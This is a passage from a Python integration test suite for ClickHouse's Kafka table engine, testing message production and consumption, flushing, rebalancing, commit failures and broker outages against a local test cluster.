SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert1',
kafka_group_name = 'insert1',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
values = []
for i in range(50):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
messages = []
while True:
messages.extend(kafka_consume(kafka_cluster, 'insert1'))
if len(messages) == 50:
break
result = '\n'.join(messages)
kafka_check_result(result, True)
def test_kafka_produce_consume(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert2',
kafka_group_name = 'insert2',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages_num = 10000
def insert():
values = []
for i in range(messages_num):
values.append("({i}, {i})".format(i=i))
values = ','.join(values)
while True:
try:
instance.query("INSERT INTO test.kafka VALUES {}".format(values))
break
except QueryRuntimeException as e:
if 'Local: Timed out.' in str(e):
continue
else:
raise
threads = []
threads_num = 16
for _ in range(threads_num):
threads.append(threading.Thread(target=insert))
for thread in threads:
time.sleep(random.uniform(0, 1))
thread.start()
while True:
result = instance.query('SELECT count() FROM test.view')
time.sleep(1)
if int(result) == messages_num * threads_num:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
for thread in threads:
thread.join()
assert int(result) == messages_num * threads_num, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_commit_on_block_write(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
cancel = threading.Event()
i = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(101):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'block', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
while int(instance.query('SELECT count() FROM test.view')) == 0:
time.sleep(1)
cancel.set()
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'block',
kafka_group_name = 'block',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
''')
while int(instance.query('SELECT uniqExact(key) FROM test.view')) < i[0]:
time.sleep(1)
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.view'))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_virtual_columns2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="virt2_0", num_partitions=2, replication_factor=1))
topic_list.append(NewTopic(name="virt2_1", num_partitions=2, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2_0,virt2_1',
kafka_group_name = 'virt2',
kafka_num_consumers = 2,
kafka_format = 'JSONEachRow';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT value, _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp), toUnixTimestamp64Milli(_timestamp_ms), _headers.name, _headers.value FROM test.kafka;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='virt2_0', value=json.dumps({'value': 1}), partition=0, key='k1', timestamp_ms=1577836801001,
headers=[('content-encoding', b'base64')])
producer.send(topic='virt2_0', value=json.dumps({'value': 2}), partition=0, key='k2', timestamp_ms=1577836802002,
headers=[('empty_value', b''), ('', b'empty name'), ('', b''), ('repetition', b'1'), ('repetition', b'2')])
producer.flush()
producer.send(topic='virt2_0', value=json.dumps({'value': 3}), partition=1, key='k3', timestamp_ms=1577836803003,
headers=[('b', b'b'), ('a', b'a')])
producer.send(topic='virt2_0', value=json.dumps({'value': 4}), partition=1, key='k4', timestamp_ms=1577836804004,
headers=[('a', b'a'), ('b', b'b')])
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 5}), partition=0, key='k5', timestamp_ms=1577836805005)
producer.send(topic='virt2_1', value=json.dumps({'value': 6}), partition=0, key='k6', timestamp_ms=1577836806006)
producer.flush()
producer.send(topic='virt2_1', value=json.dumps({'value': 7}), partition=1, key='k7', timestamp_ms=1577836807007)
producer.send(topic='virt2_1', value=json.dumps({'value': 8}), partition=1, key='k8', timestamp_ms=1577836808008)
producer.flush()
instance.wait_for_log_line('kafka.*Committed offset 2.*virt2_[01]', repetitions=4, look_behind_lines=6000)
members = describe_consumer_group(kafka_cluster, 'virt2')
# pprint.pprint(members)
members[0]['client_id'] = 'ClickHouse-instance-test-kafka-0'
members[1]['client_id'] = 'ClickHouse-instance-test-kafka-1'
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
expected = '''\
1 k1 virt2_0 0 0 1577836801 1577836801001 ['content-encoding'] ['base64']
2 k2 virt2_0 0 1 1577836802 1577836802002 ['empty_value','','','repetition','repetition'] ['','empty name','','1','2']
3 k3 virt2_0 1 0 1577836803 1577836803003 ['b','a'] ['b','a']
4 k4 virt2_0 1 1 1577836804 1577836804004 ['a','b'] ['a','b']
5 k5 virt2_1 0 0 1577836805 1577836805005 [] []
6 k6 virt2_1 0 1 1577836806 1577836806006 [] []
7 k7 virt2_1 1 0 1577836807 1577836807007 [] []
8 k8 virt2_1 1 1 1577836808 1577836808008 [] []
'''
assert TSV(result) == TSV(expected)
def test_kafka_produce_key_timestamp(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="insert3", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka_writer (key UInt64, value UInt64, _key String, _timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE TABLE test.kafka (key UInt64, value UInt64, inserted_key String, inserted_timestamp DateTime('UTC'))
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'insert3',
kafka_group_name = 'insert3',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
CREATE MATERIALIZED VIEW test.view Engine=Log AS
SELECT key, value, inserted_key, toUnixTimestamp(inserted_timestamp), _key, _topic, _partition, _offset, toUnixTimestamp(_timestamp) FROM test.kafka;
''')
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(1, 1, 'k1', 1577836801))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(2, 2, 'k2', 1577836802))
instance.query(
"INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({})),({},{},'{}',toDateTime({}))".format(3, 3,
'k3',
1577836803,
4, 4,
'k4',
1577836804))
instance.query("INSERT INTO test.kafka_writer VALUES ({},{},'{}',toDateTime({}))".format(5, 5, 'k5', 1577836805))
instance.wait_for_log_line("Committed offset 5")
result = instance.query("SELECT * FROM test.view ORDER BY value", ignore_error=True)
# logging.debug(result)
expected = '''\
1 1 k1 1577836801 k1 insert3 0 0 1577836801
2 2 k2 1577836802 k2 insert3 0 1 1577836802
3 3 k3 1577836803 k3 insert3 0 2 1577836803
4 4 k4 1577836804 k4 insert3 0 3 1577836804
5 5 k5 1577836805 k5 insert3 0 4 1577836805
'''
assert TSV(result) == TSV(expected)
def test_kafka_flush_by_time(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="flush_by_time", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_time',
kafka_group_name = 'flush_by_time',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_row_delimiter = '\\n';
SELECT * FROM test.kafka;
CREATE TABLE test.view (key UInt64, value UInt64, ts DateTime64(3) MATERIALIZED now64(3))
ENGINE = MergeTree()
ORDER BY key;
''')
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_time', messages)
time.sleep(0.8)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
time.sleep(18)
result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# more flushes can happens during test, we need to check only result of first flush (part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONSURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Waiting for test.kafka_consumerX to start consume ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# I leave last one working by intent (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONSURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# init PartitionManager (it starts container) earlier
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before write suffix
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while writing suffix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Waiting for test.kafka_consumer to start consume
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# the tricky part here is that disconnect should happen after write prefix, but before we do commit
# we have 0.25 (sleepEachRow) * 20 ( Rows ) = 5 sec window after "Polled batch of 20 messages"
# while materialized view is working to inject zookeeper failure
kafka_cluster.pause_container('kafka1')
# if we restore the connection too fast (<30sec) librdkafka will not report any timeout
# (alternative is to decrease the default session timeouts for librdkafka)
#
# when the delay is too long (>50sec) broker will decide to remove us from the consumer group,
# and will start answering "Broker: Unknown member"
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# timeout triggers rebalance, making further commits to the topic after getting back online
# impossible. So we have a duplicate in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# if we came to partition end we will repeat polling until reaching kafka_max_block_size or flush_interval
# that behavior is a bit quesionable - we can just take a bigger pauses between polls instead -
# to do more job in a single pass, and give more rest for a thread.
# But in cases of some peaky loads in kafka topic the current contract sounds more predictable and
# easier to understand, so let's keep it as is for now.
# also we can came to eof because we drained librdkafka internal queue too fast
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# messages created here will be consumed immedeately after MV creation
# reaching topic EOF.
# But we should not do flush immedeately after reaching EOF, because
# next poll can return more data, and we should respect kafka_flush_interval_ms
# and try to form bigger block
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# all subscriptions/assignments done during select, so it start sending data to test.destination
# immediately after creation of MV
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# it should be single part, i.e. single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# enough to trigger issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka Engine from an empty SELECT sub query was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
